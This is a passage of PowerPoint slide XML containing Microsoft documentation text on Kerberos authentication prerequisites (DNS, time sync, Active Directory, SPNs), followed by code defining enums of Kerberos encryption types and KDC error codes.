            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kerberos authentication relies on client functionality that is built in to the Windows Server 2003 operating system, the Microsoft Windows XP operating system, and the Windows 2000 operating system. If a client, domain controller, or target server is running an earlier operating system, it cannot natively use Kerberos authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>TCP/IP Network Connectivity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>For Kerberos authentication to occur, TCP/IP network connectivity must exist between the client, the domain controller, and the target server. For more information about TCP/IP, see “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>TCP/IP Technical Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Domain Name System</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The client uses the fully qualified domain name (FQDN) to access the domain controller. DNS must be functioning for the client to obtain the FQDN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>For best results, do not use Hosts files with DNS. For more information about DNS, see “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DNS Technical Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Active Directory Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Kerberos authentication is not supported in earlier operating systems, such as the Microsoft Windows NT 4.0 operating system. You must be using user and computer accounts in the Active Directory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> service to use Kerberos authentication. Local accounts and Windows NT domain accounts cannot be used for Kerberos authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Time Service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>For Kerberos authentication to function correctly, all domains and forests in a network should use the same time source so that the time on all network computers is synchronized. An Active Directory domain controller acts as an authoritative source of time for its domain, which guarantees that an entire domain has the same time. For more information, see “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Windows Time Service Technical Reference</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Service Principal Names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Service principal names (SPNs) are unique identifiers for services running on servers. Every service that uses Kerberos authentication needs to have an SPN set for it so that clients can identify the service on the network. If an SPN is not set for a service, clients have no way of locating that service. Without correctly set SPNs, Kerberos authentication is not possible. For more information about user-to-user authentication, see “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>How the Kerberos Version 5 Authentication Protocol Works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>,” and search for “The User-to-User Authentication Process.”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73485238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150</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346986120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types</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> = @'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> System;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>namespace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>{</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public</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enum</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EncryptionTypes:uint</a:t>
            </a:r>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AES256_CTS_HMAC_SHA1_96 = 18,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        AES128_CTS_HMAC_SHA1_96 = 17,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        ARCFOUR_HMAC_MD5 = 23,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        DES_CBC_MD5 = 3,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        DES_CBC_CRC = 1,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        ARCFOUR_HMAC_MD5_56 = 24,</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unknown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>=4294967295</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public</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enum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Errors</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KDC_ERR_NONE = 0x0,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_NAME_EXP = 0x1,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_SERVICE_EXP = 0x2,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_BAD_PVNO = 0x3,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_C_OLD_MAST_KVNO = 0x4,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_S_OLD_MAST_KVNO = 0x5,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_C_PRINCIPAL_UNKNOWN = 0x6,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_S_PRINCIPAL_UNKNOWN = 0x7,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_PRINCIPAL_NOT_UNIQUE = 0x8,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_NULL_KEY = 0x9,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_CANNOT_POSTDATE = 0xA,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_NEVER_VALID = 0xB,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_POLICY = 0xC,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_BADOPTION = 0xD,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_ETYPE_NOTSUPP = 0xE,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_SUMTYPE_NOSUPP = 0xF,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_PADATA_TYPE_NOSUPP = 0x10,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_TRTYPE_NO_SUPP = 0x11,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_CLIENT_REVOKED = 0x12,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_SERVICE_REVOKED = 0x13,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_TGT_REVOKED = 0x14,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_CLIENT_NOTYET = 0x15,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_SERVICE_NOTYET = 0x16,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_KEY_EXPIRED = 0x17,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_PREAUTH_FAILED = 0x18,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_PREAUTH_REQUIRED = 0x19,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_SERVER_NOMATCH = 0x1A,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KDC_ERR_SVC_UNAVAILABLE = 0x1B,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BAD_INTEGRITY = 0x1F,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_TKT_EXPIRED = 0x20,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_TKT_NYV = 0x21,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_REPEAT = 0x22,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_NOT_US = 0x23,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADMATCH = 0x24,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_SKEW = 0x25,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADADDR = 0x26,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADVERSION = 0x27,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_MSG_TYPE = 0x28,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_MODIFIED = 0x29,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADORDER = 0x2A,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADKEYVER = 0x2C,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_NOKEY = 0x2D,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_MUT_FAIL = 0x2E,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADDIRECTION = 0x2F,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_METHOD = 0x30,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_BADSEQ = 0x31,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>        KRB_AP_ERR_INAPP_CKSUM = 0x32,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
